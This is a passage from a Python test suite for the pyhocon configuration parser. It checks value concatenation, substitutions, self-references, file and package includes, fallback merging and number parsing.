"""
)
assert config.get('a') == 'a b c'
assert config.get('b') == '5 b'
assert config.get('c') == 'b 7'
def test_concat_list(self):
config = ConfigFactory.parse_string(
"""
a = [1, 2] [3, 4] [
5,
6
]
"""
)
assert config.get('a') == [1, 2, 3, 4, 5, 6]
assert config.get_list('a') == [1, 2, 3, 4, 5, 6]
def test_bad_concat(self):
ConfigFactory.parse_string('a = 45\n')
with pytest.raises(ConfigWrongTypeException):
ConfigFactory.parse_string('a = [4] "4"')
with pytest.raises(ConfigWrongTypeException):
ConfigFactory.parse_string('a = "4" [5]')
with pytest.raises(ConfigWrongTypeException):
ConfigFactory.parse_string('a = {b: 5} "4"')
def test_string_substitutions(self):
config1 = ConfigFactory.parse_string(
"""
{
a: {
b: {
c = str
e = "str "
}
}
d = ${a.b.c}
f = ${a.b.e}
}
"""
)
assert config1.get('a.b.c') == 'str'
assert config1.get('d') == 'str'
assert config1.get('f') == 'str '
config2 = ConfigFactory.parse_string(
"""
{
a: {
b: {
c = str
e = "str "
}
}
d = test ${a.b.c}
f = test ${a.b.e}
}
"""
)
assert config2.get('a.b.c') == 'str'
assert config2.get('d') == 'test str'
assert config2.get('f') == 'test str '
config3 = ConfigFactory.parse_string(
u"""
{
a: {
b: {
c = str
e = "str "
}
}
d = test ${a.b.c} me
f = test ${a.b.e} me
}
"""
)
assert config3.get('a.b.c') == 'str'
assert config3.get('d') == 'test str me'
assert config3.get('f') == 'test str me'
def test_string_substitutions_with_no_space(self):
config = ConfigFactory.parse_string(
"""
app.heap_size = 128
app.java_opts = [
-Xms${app.heap_size}m
-Xmx${app.heap_size}m
]
"""
)
assert config.get('app.java_opts') == [
'-Xms128m',
'-Xmx128m'
]
def test_int_substitutions(self):
config1 = ConfigFactory.parse_string(
"""
{
a: {
b: {
c = 5
}
}
d = ${a.b.c}
}
"""
)
assert config1.get('a.b.c') == 5
assert config1.get('d') == 5
config2 = ConfigFactory.parse_string(
"""
{
a: {
b: {
c = 5
}
}
d = test ${a.b.c}
}
"""
)
assert config2.get('a.b.c') == 5
assert config2.get('d') == 'test 5'
config3 = ConfigFactory.parse_string(
"""
{
a: {
b: {
c = 5
}
}
d = test ${a.b.c} me
}
"""
)
assert config3.get('a.b.c') == 5
assert config3.get('d') == 'test 5 me'
def test_cascade_string_substitutions(self):
config = ConfigFactory.parse_string(
"""
{
a: {
b: {
c = ${e}
}
}
d = test ${a.b.c} me
e = 7
}
"""
)
assert config.get('a.b.c') == 7
assert config.get('d') == 'test 7 me'
def test_multiple_substitutions(self):
config = ConfigFactory.parse_string(
"""
a = 5
b=${a}${a}
c=${a} ${a}
"""
)
assert config == {
'a': 5,
'b': '55',
'c': '5 5'
}
def test_dict_substitutions(self):
config = ConfigFactory.parse_string(
"""
data-center-generic = { cluster-size = 6 }
data-center-east = ${data-center-generic} {name = "east"}
"""
)
assert config.get('data-center-east.cluster-size') == 6
assert config.get('data-center-east.name') == 'east'
config2 = ConfigFactory.parse_string(
"""
data-center-generic = { cluster-size = 6 }
data-center-east = {name = "east"} ${data-center-generic}
"""
)
assert config2.get('data-center-east.cluster-size') == 6
assert config2.get('data-center-east.name') == 'east'
config3 = ConfigFactory.parse_string(
"""
data-center-generic = { cluster-size = 6 }
data-center-east = {name = "east"} ${data-center-generic} { cluster-size = 9, opts = "-Xmx4g" }
"""
)
assert config3.get('data-center-east.cluster-size') == 9
assert config3.get('data-center-east.name') == 'east'
assert config3.get('data-center-east.opts') == '-Xmx4g'
config4 = ConfigFactory.parse_string(
"""
data-center-generic = { cluster-size = 6 }
data-center-east = {name = "east"} ${data-center-generic}
data-center-east-prod = ${data-center-east} {tmpDir=/tmp}
"""
)
assert config4.get('data-center-east.cluster-size') == 6
assert config4.get('data-center-east.name') == 'east'
assert config4.get('data-center-east-prod.cluster-size') == 6
assert config4.get('data-center-east-prod.tmpDir') == '/tmp'
config5 = ConfigFactory.parse_string(
"""
data-center-generic = { cluster-size = 6 }
data-center-east = ${data-center-generic}
data-center-east = { name = "east" }
"""
)
assert config5['data-center-east'] == {
'name': 'east',
'cluster-size': 6
}
config6 = ConfigFactory.parse_string(
"""
data-center-generic = { cluster-size = 6 }
data-center-east = { name = "east" }
data-center-east = ${data-center-generic}
"""
)
assert config6['data-center-east'] == {
'name': 'east',
'cluster-size': 6
}
def test_dos_chars_with_unquoted_string_noeol(self):
config = ConfigFactory.parse_string("foo = bar")
assert config['foo'] == 'bar'
def test_dos_chars_with_quoted_string_noeol(self):
config = ConfigFactory.parse_string('foo = "5"')
assert config['foo'] == '5'
def test_dos_chars_with_triple_quoted_string_noeol(self):
config = ConfigFactory.parse_string('foo = """5"""')
assert config['foo'] == '5'
def test_dos_chars_with_int_noeol(self):
config = ConfigFactory.parse_string("foo = 5")
assert config['foo'] == 5
def test_dos_chars_with_float_noeol(self):
config = ConfigFactory.parse_string("foo = 5.0")
assert config['foo'] == 5.0
def test_list_substitutions(self):
config = ConfigFactory.parse_string(
"""
common_modules = [php, python]
host_modules = ${common_modules} [java]
"""
)
assert config.get('host_modules') == ['php', 'python', 'java']
config2 = ConfigFactory.parse_string(
"""
common_modules = [php, python]
host_modules = [java] ${common_modules}
"""
)
assert config2.get('host_modules') == ['java', 'php', 'python']
config3 = ConfigFactory.parse_string(
"""
common_modules = [php, python]
host_modules = [java] ${common_modules} [perl]
"""
)
assert config3.get('common_modules') == ['php', 'python']
assert config3.get('host_modules') == ['java', 'php', 'python', 'perl']
config4 = ConfigFactory.parse_string(
"""
common_modules = [php, python]
host_modules = [java] ${common_modules} [perl]
full_modules = ${host_modules} [c, go]
"""
)
assert config4.get('common_modules') == ['php', 'python']
assert config4.get('host_modules') == ['java', 'php', 'python', 'perl']
assert config4.get('full_modules') == ['java', 'php', 'python', 'perl', 'c', 'go']
def test_list_element_substitution(self):
config = ConfigFactory.parse_string(
"""
main_language = php
languages = [java, ${main_language}]
"""
)
assert config.get('languages') == ['java', 'php']
def test_substitution_list_with_append(self):
config = ConfigFactory.parse_string(
"""
application.foo = 128mm
application.large-jvm-opts = ["-XX:+UseParNewGC"] [-Xm16g, ${application.foo}]
application.large-jvm-opts2 = [-Xm16g, ${application.foo}] ["-XX:+UseParNewGC"]
""")
assert config["application.large-jvm-opts"] == [
'-XX:+UseParNewGC',
'-Xm16g',
'128mm'
]
assert config["application.large-jvm-opts2"] == [
'-Xm16g',
'128mm',
'-XX:+UseParNewGC',
]
def test_substitution_list_with_append_substitution(self):
config = ConfigFactory.parse_string(
"""
application.foo = 128mm
application.default-jvm-opts = ["-XX:+UseParNewGC"]
application.large-jvm-opts = ${application.default-jvm-opts} [-Xm16g, ${application.foo}]
application.large-jvm-opts2 = [-Xm16g, ${application.foo}] ${application.default-jvm-opts}
""")
assert config["application.large-jvm-opts"] == [
'-XX:+UseParNewGC',
'-Xm16g',
'128mm'
]
assert config["application.large-jvm-opts2"] == [
'-Xm16g',
'128mm',
'-XX:+UseParNewGC'
]
def test_non_existent_substitution(self):
with pytest.raises(ConfigSubstitutionException):
ConfigFactory.parse_string(
"""
common_modules = ${non_existent}
"""
)
with pytest.raises(ConfigSubstitutionException):
ConfigFactory.parse_string(
"""
common_modules = abc ${non_existent}
"""
)
with pytest.raises(ConfigSubstitutionException):
ConfigFactory.parse_string(
"""
common_modules = ${non_existent} abc
"""
)
with pytest.raises(ConfigSubstitutionException):
ConfigFactory.parse_string(
"""
common_modules = abc ${non_existent} def
"""
)
def test_non_compatible_substitution(self):
with pytest.raises(ConfigWrongTypeException):
ConfigFactory.parse_string(
"""
common_modules = [perl]
host_modules = 55 ${common_modules}
"""
)
with pytest.raises(ConfigWrongTypeException):
ConfigFactory.parse_string(
"""
common_modules = [perl]
host_modules = ${common_modules} 55
"""
)
with pytest.raises(ConfigWrongTypeException):
ConfigFactory.parse_string(
"""
common_modules = [perl]
host_modules = aa ${common_modules} bb
"""
)
with pytest.raises(ConfigWrongTypeException):
ConfigFactory.parse_string(
"""
common_modules = [perl]
host_modules = aa ${common_modules}
"""
)
with pytest.raises(ConfigWrongTypeException):
ConfigFactory.parse_string(
"""
common_modules = [perl]
host_modules = ${common_modules} aa
"""
)
with pytest.raises(ConfigWrongTypeException):
ConfigFactory.parse_string(
"""
common_modules = [perl]
host_modules = aa ${common_modules} bb
"""
)
def test_self_ref_substitution_array(self):
config = ConfigFactory.parse_string(
"""
x = [1,2]
x = ${x} [3,4]
x = [-1, 0] ${x} [5, 6]
x = [-3, -2] ${x}
"""
)
assert config.get("x") == [-3, -2, -1, 0, 1, 2, 3, 4, 5, 6]
def test_self_append_array(self):
config = ConfigFactory.parse_string(
"""
x = [1,2]
x += [3,4]
"""
)
assert config.get("x") == [1, 2, 3, 4]
def test_self_append_string(self):
'''
Should be equivalent to
x = abc
x = ${?x} def
'''
config = ConfigFactory.parse_string(
"""
x = abc
x += def
"""
)
assert config.get("x") == "abc def"
def test_self_append_non_existent_string(self):
'''
Should be equivalent to x = ${?x} def
'''
config = ConfigFactory.parse_string(
"""
x += def
"""
)
assert config.get("x") == " def"
def test_self_append_nonexistent_array(self):
config = ConfigFactory.parse_string(
"""
x += [1,2]
"""
)
assert config.get("x") == [1, 2]
def test_self_append_object(self):
config = ConfigFactory.parse_string(
"""
x = {a: 1}
x += {b: 2}
"""
)
assert config.get("x") == {'a': 1, 'b': 2}
def test_self_append_nonexistent_object(self):
config = ConfigFactory.parse_string(
"""
x += {a: 1}
"""
)
assert config.get("x") == {'a': 1}
def test_self_ref_substitution_array_to_dict(self):
config = ConfigFactory.parse_string(
"""
x = [1,2]
x = {x: [3,4]}
x = {y: [5,6]}
x = {z: ${x}}
"""
)
assert config.get("x.x") == [3, 4]
assert config.get("x.y") == [5, 6]
assert config.get("x.z") == {'x': [3, 4], 'y': [5, 6]}
    def test_self_ref_substitution_dict_in_array(self):
config = ConfigFactory.parse_string(
"""
x = {x: [3,4]}
x = [${x}, 2, 3]
"""
)
(one, two, three) = config.get("x")
assert one == {'x': [3, 4]}
assert two == 2
assert three == 3
def test_self_ref_substitution_dict_path(self):
config = ConfigFactory.parse_string(
"""
x = {y: {z: 1}}
x = ${x.y}
"""
)
assert config.get("x.y") == {'z': 1}
assert config.get("x.z") == 1
assert set(config.get("x").keys()) == set(['y', 'z'])
def test_self_ref_substitution_dict_path_hide(self):
config = ConfigFactory.parse_string(
"""
x = {y: {y: 1}}
x = ${x.y}
"""
)
assert config.get("x.y") == 1
assert set(config.get("x").keys()) == set(['y'])
def test_self_ref_substitution_dict_recurse(self):
with pytest.raises(ConfigSubstitutionException):
ConfigFactory.parse_string(
"""
x = ${x}
"""
)
def test_self_ref_substitution_dict_recurse2(self):
with pytest.raises(ConfigSubstitutionException):
ConfigFactory.parse_string(
"""
x = ${x}
x = ${x}
"""
)
def test_self_ref_substitution_dict_merge(self):
'''
Example from HOCON spec
'''
config = ConfigFactory.parse_string(
"""
foo : { a : { c : 1 } }
foo : ${foo.a}
foo : { a : 2 }
"""
)
assert config.get('foo') == {'a': 2, 'c': 1}
assert set(config.keys()) == set(['foo'])
def test_self_ref_substitution_dict_otherfield(self):
'''
Example from HOCON spec
'''
config = ConfigFactory.parse_string(
"""
bar : {
foo : 42,
baz : ${bar.foo}
}
"""
)
assert config.get("bar") == {'foo': 42, 'baz': 42}
assert set(config.keys()) == set(['bar'])
def test_self_ref_substitution_dict_otherfield_merged_in(self):
'''
Example from HOCON spec
'''
config = ConfigFactory.parse_string(
"""
bar : {
foo : 42,
baz : ${bar.foo}
}
bar : { foo : 43 }
"""
)
assert config.get("bar") == {'foo': 43, 'baz': 43}
assert set(config.keys()) == set(['bar'])
def test_self_ref_substitution_dict_otherfield_merged_in_mutual(self):
'''
Example from HOCON spec
'''
config = ConfigFactory.parse_string(
"""
// bar.a should end up as 4
bar : { a : ${foo.d}, b : 1 }
bar.b = 3
// foo.c should end up as 3
foo : { c : ${bar.b}, d : 2 }
foo.d = 4
"""
)
assert config.get("bar") == {'a': 4, 'b': 3}
assert config.get("foo") == {'c': 3, 'd': 4}
assert set(config.keys()) == set(['bar', 'foo'])
def test_self_ref_substitution_string_opt_concat(self):
'''
Example from HOCON spec
'''
config = ConfigFactory.parse_string(
"""
a = ${?a}foo
"""
)
assert config.get("a") == 'foo'
assert set(config.keys()) == set(['a'])
def test_self_ref_substitution_dict_recurse_part(self):
with pytest.raises(ConfigSubstitutionException):
ConfigFactory.parse_string(
"""
x = ${x} {y: 1}
x = ${x.y}
"""
)
def test_self_ref_substitution_object(self):
config = ConfigFactory.parse_string(
"""
x = {a: 1, b: 2}
x = ${x} {c: 3}
x = {z: 0} ${x}
x = {y: -1} ${x} {d: 4}
"""
)
assert config.get("x") == {'a': 1, 'b': 2, 'c': 3, 'z': 0, 'y': -1, 'd': 4}
def test_self_ref_child(self):
config = ConfigFactory.parse_string(
"""
a.b = 3
a.b = ${a.b}
a.b = ${a.b}
a.c = [1,2]
a.c = ${a.c}
a.d = {foo: bar}
a.d = ${a.d}
"""
)
assert config.get("a") == {'b': 3, 'c': [1, 2], 'd': {'foo': 'bar'}}
def test_concat_multi_line_string(self):
config = ConfigFactory.parse_string(
"""
common_modules = perl \
java \
python
"""
)
assert [x.strip() for x in config['common_modules'].split() if x.strip(' ') != ''] == ['perl', 'java', 'python']
def test_concat_multi_line_list(self):
config = ConfigFactory.parse_string(
"""
common_modules = [perl] \
[java] \
[python]
"""
)
assert config['common_modules'] == ['perl', 'java', 'python']
def test_concat_multi_line_dict(self):
config = ConfigFactory.parse_string(
"""
common_modules = {a:perl} \
{b:java} \
{c:python}
"""
)
assert config['common_modules'] == {'a': 'perl', 'b': 'java', 'c': 'python'}
def test_parse_URL_from_samples(self):
config = ConfigFactory.parse_URL("file:samples/aws.conf")
assert config.get('data-center-generic.cluster-size') == 6
assert config.get('large-jvm-opts') == ['-XX:+UseParNewGC', '-Xm16g']
def test_parse_URL_from_invalid(self):
config = ConfigFactory.parse_URL("https://nosuchurl")
assert config == []
def test_include_dict_from_samples(self):
config = ConfigFactory.parse_file("samples/animals.conf")
assert config.get('cat.garfield.say') == 'meow'
assert config.get('dog.mutt.hates.garfield.say') == 'meow'
def test_include_glob_dict_from_samples(self):
config = ConfigFactory.parse_file("samples/all_animals.conf")
assert config.get('animals.garfield.say') == 'meow'
assert config.get('animals.mutt.hates.garfield.say') == 'meow'
def test_include_glob_list_from_samples(self):
config = ConfigFactory.parse_file("samples/all_bars.conf")
bars = config.get_list('bars')
assert len(bars) == 10
names = {bar['name'] for bar in bars}
types = {bar['type'] for bar in bars if 'type' in bar}
print(types, '(((((')
assert 'Bloody Mary' in names
assert 'Homer\'s favorite coffee' in names
assert 'milk' in types
def test_list_of_dicts(self):
config = ConfigFactory.parse_string(
"""
a: [
{a: 1, b: 2},
{a: 3, c: 4},
]
"""
)
assert config['a'] == [
{'a': 1, 'b': 2},
{'a': 3, 'c': 4}
]
def test_list_of_lists(self):
config = ConfigFactory.parse_string(
"""
a: [
[1, 2]
[3, 4]
]
"""
)
assert config['a'] == [
[1, 2],
[3, 4]
]
def test_list_of_dicts_with_merge(self):
config = ConfigFactory.parse_string(
"""
b = {f: 4}
a: [
${b} {a: 1, b: 2},
{a: 3, c: 4} ${b},
{a: 3} ${b} {c: 6},
]
"""
)
assert config['a'] == [
{'a': 1, 'b': 2, 'f': 4},
{'a': 3, 'c': 4, 'f': 4},
{'a': 3, 'c': 6, 'f': 4}
]
def test_list_of_lists_with_merge(self):
config = ConfigFactory.parse_string(
"""
b = [5, 6]
a: [
${b} [1, 2]
[3, 4] ${b}
[1, 2] ${b} [7, 8]
]
"""
)
assert config['a'] == [
[5, 6, 1, 2],
[3, 4, 5, 6],
[1, 2, 5, 6, 7, 8]
]
def test_invalid_assignment(self):
with pytest.raises(ParseSyntaxException):
ConfigFactory.parse_string('common_modules [perl]')
with pytest.raises(ParseException):
ConfigFactory.parse_string('common_modules {} {perl: 1}')
with pytest.raises(ParseSyntaxException):
ConfigFactory.parse_string(
"""
a = {f: 5}
common_modules ${a} {perl: 1}
""")
def test_invalid_dict(self):
with pytest.raises(ParseSyntaxException):
ConfigFactory.parse_string(
"""
a = {
f: 5
g
}
""")
with pytest.raises(ParseSyntaxException):
ConfigFactory.parse_string('a = {g}')
def test_include_file(self):
with tempfile.NamedTemporaryFile('w') as fdin:
fdin.write('[1, 2]')
fdin.flush()
config1 = ConfigFactory.parse_string(
"""
a: [
include "{tmp_file}"
]
""".format(tmp_file=fdin.name)
)
assert config1['a'] == [1, 2]
config2 = ConfigFactory.parse_string(
"""
a: [
include file("{tmp_file}")
]
""".format(tmp_file=fdin.name)
)
assert config2['a'] == [1, 2]
config3 = ConfigFactory.parse_string(
"""
a: [
include url("file://{tmp_file}")
]
""".format(tmp_file=fdin.name)
)
assert config3['a'] == [1, 2]
def test_include_missing_file(self):
config1 = ConfigFactory.parse_string(
"""
a: [
include "dummy.txt"
3
4
]
"""
)
assert config1['a'] == [3, 4]
def test_include_required_file(self):
config = ConfigFactory.parse_string(
"""
a {
include required("samples/animals.d/cat.conf")
t = 2
}
"""
)
expected = {
'a': {
'garfield': {
'say': 'meow'
},
't': 2
}
}
assert expected == config
config2 = ConfigFactory.parse_string(
"""
a {
include required(file("samples/animals.d/cat.conf"))
t = 2
}
"""
)
assert expected == config2
def test_include_missing_required_file(self):
with pytest.raises(IOError):
ConfigFactory.parse_string(
"""
a: [
include required("dummy.txt")
3
4
]
"""
)
def test_resolve_package_path(self):
path = ConfigParser.resolve_package_path("pyhocon:config_parser.py")
assert os.path.exists(path)
def test_resolve_package_path_format(self):
with pytest.raises(ValueError):
ConfigParser.resolve_package_path("pyhocon/config_parser.py")
def test_resolve_package_path_missing(self):
with pytest.raises(ImportError):
ConfigParser.resolve_package_path("non_existent_module:foo.py")
def test_include_package_file(self, monkeypatch):
temp_dir = tempfile.mkdtemp()
try:
module_dir = os.path.join(temp_dir, 'my_module')
module_conf = os.path.join(module_dir, 'my.conf')
# create the module folder and necessary files (__init__ and config)
os.mkdir(module_dir)
open(os.path.join(module_dir, '__init__.py'), 'a').close()
with open(module_conf, 'w') as fdin:
fdin.write("{c: 3}")
# add the temp dir to sys.path so that 'my_module' can be discovered
monkeypatch.syspath_prepend(temp_dir)
# load the config and include the other config file from 'my_module'
config = ConfigFactory.parse_string(
"""
a: 1
b: 2
include package("my_module:my.conf")
"""
)
# check that the contents of both config files are available
assert dict(config.as_plain_ordered_dict()) == {'a': 1, 'b': 2, 'c': 3}
finally:
shutil.rmtree(temp_dir, ignore_errors=True)
def test_include_dict(self):
expected_res = {
'a': 1,
'b': 2,
'c': 3,
'd': 4
}
with tempfile.NamedTemporaryFile('w') as fdin:
fdin.write('{a: 1, b: 2}')
fdin.flush()
config1 = ConfigFactory.parse_string(
"""
a: {{
include "{tmp_file}"
c: 3
d: 4
}}
""".format(tmp_file=fdin.name)
)
assert config1['a'] == expected_res
config2 = ConfigFactory.parse_string(
"""
a: {{
c: 3
d: 4
include "{tmp_file}"
}}
""".format(tmp_file=fdin.name)
)
assert config2['a'] == expected_res
config3 = ConfigFactory.parse_string(
"""
a: {{
c: 3
include "{tmp_file}"
d: 4
}}
""".format(tmp_file=fdin.name)
)
assert config3['a'] == expected_res
def test_include_substitution(self):
with tempfile.NamedTemporaryFile('w') as fdin:
fdin.write('y = ${x}')
fdin.flush()
config = ConfigFactory.parse_string(
"""
include "{tmp_file}"
x = 42
""".format(tmp_file=fdin.name)
)
assert config['x'] == 42
assert config['y'] == 42
@pytest.mark.xfail
def test_include_substitution2(self):
with tempfile.NamedTemporaryFile('w') as fdin:
fdin.write('{ x : 10, y : ${x} }')
fdin.flush()
config = ConfigFactory.parse_string(
"""
{
a : { include """ + '"' + fdin.name + """" }
a : { x : 42 }
}
"""
)
assert config['a']['x'] == 42
assert config['a']['y'] == 42
def test_var_with_include_keyword(self):
config = ConfigFactory.parse_string(
"""
include-database=true
""")
assert config == {
'include-database': True
}
def test_substitution_override(self):
config = ConfigFactory.parse_string(
"""
database {
host = localhost
port = 5432
user = people
name = peopledb
pass = peoplepass
}
user=test_user
pass=test_pass
database {
user = ${user}
pass = ${pass}
}
""")
assert config['database.user'] == 'test_user'
assert config['database.pass'] == 'test_pass'
def test_substitution_flat_override(self):
config = ConfigFactory.parse_string(
"""
database {
name = peopledb
pass = peoplepass
name = ${?NOT_EXISTS}
pass = ${?NOT_EXISTS}
}
""")
assert config['database.name'] == 'peopledb'
assert config['database.pass'] == 'peoplepass'
def test_substitution_multiple_override(self):
config = ConfigFactory.parse_string(
"""
a: 1
b: foo
c: ${a} ${b}
c: ${b} ${a}
d: ${a} ${b}
d: ${a} bar
""")
assert config['c'] == 'foo 1'
assert config['d'] == '1 bar'
def test_substitution_nested_override(self):
config = ConfigFactory.parse_string(
"""
database {
name = peopledb
pass = peoplepass
}
database {
name = ${?user}
pass = ${?pass}
}
""")
assert config['database.name'] == 'peopledb'
assert config['database.pass'] == 'peoplepass'
def test_optional_with_merge(self):
unresolved = ConfigFactory.parse_string(
"""
foo: 42
foo: ${?a}
""", resolve=False)
source = ConfigFactory.parse_string(
"""
b: 14
""")
config = unresolved.with_fallback(source)
assert config['foo'] == 42
config = source.with_fallback(unresolved)
assert config['foo'] == 42
def test_fallback_with_resolve(self):
config3 = ConfigFactory.parse_string("c=5")
config2 = ConfigFactory.parse_string("b=${c}", resolve=False)
config1 = ConfigFactory.parse_string("a=${b}", resolve=False) \
.with_fallback(config2, resolve=False) \
.with_fallback(config3)
assert {'a': 5, 'b': 5, 'c': 5} == config1
def test_optional_substitution(self):
config = ConfigFactory.parse_string(
"""
a = 45
b = ${?c}
d = ${?c} 4
e = ${?a}
g = ${?c1} ${?c2}
h = ${?c1} ${?c2} 1
""")
assert 'b' not in config
assert config['d'] == 4
assert config['e'] == 45
assert 'g' not in config
assert config['h'] == 1
def test_cascade_optional_substitution(self):
config = ConfigFactory.parse_string(
"""
num = 3
retries_msg = You have ${num} retries
retries_msg = ${?CUSTOM_MSG}
""")
assert config == {
'num': 3,
'retries_msg': 'You have 3 retries'
}
def test_substitution_cycle(self):
with pytest.raises(ConfigSubstitutionException):
ConfigFactory.parse_string(
"""
a = ${b}
b = ${c}
c = ${a}
""")
def test_assign_number_with_eol(self):
config = ConfigFactory.parse_string(
"""
a =
4
b = # test
# test2
5
c =
6
"""
)
assert config['a'] == 4
assert config['b'] == 5
assert config['c'] == 6
def test_assign_int(self):
config = ConfigFactory.parse_string(
"""
short = 12
long = 12321321837612378126213217321
negative = -15
"""
)
# on python 3 long will be an int but on python 2 long will be a long
assert config['short'] == 12
assert isinstance(config['short'], int)
assert config['long'] == 12321321837612378126213217321
assert isinstance(config['negative'], int)
assert config['negative'] == -15
def test_assign_float(self):
config = ConfigFactory.parse_string(
"""
a = 121.22
b = -121.22
c = .54
d = -.54
"""
)
assert config['a'] == 121.22
assert config['b'] == -121.22
assert config['c'] == .54
assert config['d'] == -.54
def test_sci_real(self):
"""
Test scientific notation for numbers
"""
config = ConfigFactory.parse_string(
"""
short = 12.12321
long1 = 121.22E3423432
neg_long1 = 121.22E-1
long2 = 121.22e3423432
neg_long2 = 121.22e-3
"""
)
assert config['short'] == 12.12321
assert config['long1'] == 121.22E3423432
assert config['neg_long1'] == 121.22E-1
assert config['long2'] == 121.22E3423432
assert config['neg_long2'] == 121.22E-3
def test_assign_strings_with_eol(self):
config = ConfigFactory.parse_string(
"""
a =
"a"
b = # test
# test2
"b"
c =
"c"
"""
)
assert config['a'] == 'a'
assert config['b'] == 'b'
assert config['c'] == 'c'
def test_assign_list_numbers_with_eol(self):
config = ConfigFactory.parse_string(
"""
a =
[
1,
2,
]
b = # test
# test2
[
3,
4,]
c =
[
5,
6
]
"""
)
assert config['a'] == [1, 2]
assert config['b'] == [3, 4]
assert config['c'] == [5, 6]
def test_assign_list_strings_with_eol(self):
config = ConfigFactory.parse_string(
"""
a =
[
"a",
"b",
]
b = # test
# test2
[
"c",
"d",]
c =
[
"e",
"f"
]
"""
)
assert config['a'] == ['a', 'b']
assert config['b'] == ['c', 'd']
assert config['c'] == ['e', 'f']
def test_assign_dict_strings_with_equal_sign_with_eol(self):
config = ConfigFactory.parse_string(
"""
a =
{
a: 1,
b: 2,
}
b = # test
# test2
{
c: 3,
d: 4,}
c =
{
e: 5,
f: 6
}
"""
)
assert config['a'] == {'a': 1, 'b': 2}
assert config['b'] == {'c': 3, 'd': 4}
assert config['c'] == {'e': 5, 'f': 6}
def test_assign_dict_strings_no_equal_sign_with_eol(self):
config = ConfigFactory.parse_string(
"""
a
{
a: 1,
b: 2,
}
b # test
# test2
{
c: 3,
d: 4,}
c
{
e: 5,
f: 6
}
"""
)
assert config['a'] == {'a': 1, 'b': 2}
assert config['b'] == {'c': 3, 'd': 4}
assert config['c'] == {'e': 5, 'f': 6}
def test_substitutions_overwrite(self):
config1 = ConfigFactory.parse_string(
"""
a = 123
a = ${?test}
a = 5
"""
)
assert config1['a'] == 5
config2 = ConfigFactory.parse_string(
"""
{
database {
host = "localhost"
port = 8000
url = ${database.host}":"${database.port}
}
database {
host = ${?DB_HOST}
}
database {
host = "other.host.net"
port = 433
}
}
"""
)
assert config2['database']['host'] == 'other.host.net'
assert config2['database']['port'] == 433
assert config2['database']['url'] == 'other.host.net:433'
def test_fallback_substitutions_overwrite(self):
config1 = ConfigFactory.parse_string(
"""
a = {
b: 1
c: 2
}
"""
)
config2 = ConfigFactory.parse_string(
"""
a.b = 4
a.d = 3
"""
)
config3 = config1.with_fallback(config2)
assert config3['a'] == {
'b': 1,
'c': 2,
'd': 3
}
config4 = ConfigFactory.parse_string(
"""
name: foo
"""
)
config5 = ConfigFactory.parse_string(
u"""
longName: "long "${?name}
""",
resolve=False
)
config6 = config4.with_fallback(config5)
assert config6 == {
'longName': 'long foo',
'name': 'foo'
}
def test_fallback_substitutions_overwrite_file(self):
config1 = ConfigFactory.parse_string(
"""
{
data-center-generic = { cluster-size: 8 }
misc = "mist"
}
"""
)
# use unicode path here for regression testing https://github.com/chimpler/pyhocon/issues/44
config2 = config1.with_fallback(u'samples/aws.conf')
assert config2 == {
'data-center-generic': {'cluster-size': 8},
'data-center-east': {'cluster-size': 8, 'name': 'east'},
'misc': 'mist',
'default-jvm-opts': ['-XX:+UseParNewGC'],
'large-jvm-opts': ['-XX:+UseParNewGC', '-Xm16g']
}
def test_fallback_self_ref_substitutions_append(self):
config1 = ConfigFactory.parse_string(
"""
list = [ 1, 2, 3 ]
"""
)
config2 = ConfigFactory.parse_string(
"""
list = ${list} [ 4, 5, 6 ]
""",
resolve=False
)
config2 = config2.with_fallback(config1)
assert config2.get("list") == [1, 2, 3, 4, 5, 6]
def test_fallback_self_ref_substitutions_append_plus_equals(self):
config1 = ConfigFactory.parse_string(
"""
list = [ 1, 2, 3 ]
"""
)
config2 = ConfigFactory.parse_string(
"""
list += [ 4, 5, 6 ]
""",
resolve=False
)
config2 = config2.with_fallback(config1)
assert config2.get("list") == [1, 2, 3, 4, 5, 6]
def test_self_merge_ref_substitutions_object(self):
config1 = ConfigFactory.parse_string(
"""
a : { }
b : 1
c : ${a} { d : [ ${b} ] }
""",
resolve=False
)
config2 = ConfigFactory.parse_string(
"""
e : ${a} {
}
""",
resolve=False
)
merged = ConfigTree.merge_configs(config1, config2)
ConfigParser.resolve_substitutions(merged)
assert merged.get("c.d") == [1]
def test_self_merge_ref_substitutions_object2(self):
config1 = ConfigFactory.parse_string(
"""
x : { v1: 1 }
b1 : {v2: 2 }
b = [${b1}]
""",
resolve=False
)
config2 = ConfigFactory.parse_string(
"""
b2 : ${x} {v2: 3}
b += [${b2}]
""",
resolve=False
)
merged = ConfigTree.merge_configs(config1, config2)
ConfigParser.resolve_substitutions(merged)
b = merged.get("b")
assert len(b) == 2
assert b[0] == {'v2': 2}
assert b[1] == {'v1': 1, 'v2': 3}
def test_self_merge_ref_substitutions_object3(self):
config1 = ConfigFactory.parse_string(
"""
b1 : { v1: 1 }
b = [${b1}]
""",
resolve=False
)
config2 = ConfigFactory.parse_string(
"""
b1 : { v1: 2, v2: 3 }
""",
resolve=False
)
merged = ConfigTree.merge_configs(config1, config2)
ConfigParser.resolve_substitutions(merged)
assert merged.get("b1") == {"v1": 2, "v2": 3}
b = merged.get("b")
assert len(b) == 1
assert b[0] == {"v1": 2, "v2": 3}
def test_fallback_self_ref_substitutions_merge(self):
config1 = ConfigFactory.parse_string(
"""
dict = { x: 1 }
"""
)
config2 = ConfigFactory.parse_string(
"""
dict = ${dict} { y: 2 }
""",
resolve=False
)
config2 = config2.with_fallback(config1)
assert config2.get("dict") == {'x': 1, 'y': 2}
def test_fallback_self_ref_substitutions_concat_string(self):
config1 = ConfigFactory.parse_string(
"""
string = abc
"""
)
config2 = ConfigFactory.parse_string(
"""
string = ${string}def
""",
resolve=False
)
result = config2.with_fallback(config1)
assert result.get("string") == 'abcdef'
# test no mutation on config1
assert result is not config1
# test no mutation on config2
assert "abc" not in str(config2)
def test_fallback_non_root(self):
root = ConfigFactory.parse_string(
"""
a = 1
mid.b = 1
"""
)
config = root.get_config("mid").with_fallback(root)
assert config['a'] == 1 and config['b'] == 1
def test_object_field_substitution(self):
config = ConfigFactory.parse_string(
"""
A = ${Test}
Test {
field1 = 1
field2 = ${Test.field1}"2"
field3 = ${Test.field2}"3"
}
"""
)
assert config.get_string("A.field1") == "1"
assert config.get_string("A.field2") == "12"
assert config.get_string("A.field3") == "123"
assert config.get_string("Test.field1") == "1"
assert config.get_string("Test.field2") == "12"
assert config.get_string("Test.field3") == "123"
def test_one_line_quote_escape(self):
config = ConfigFactory.parse_string(
"""
test_no_quotes: abc\\n\\n
test_quotes: "abc\\n\\n"
"""
)
assert config == {
'test_no_quotes': 'abc\n\n',
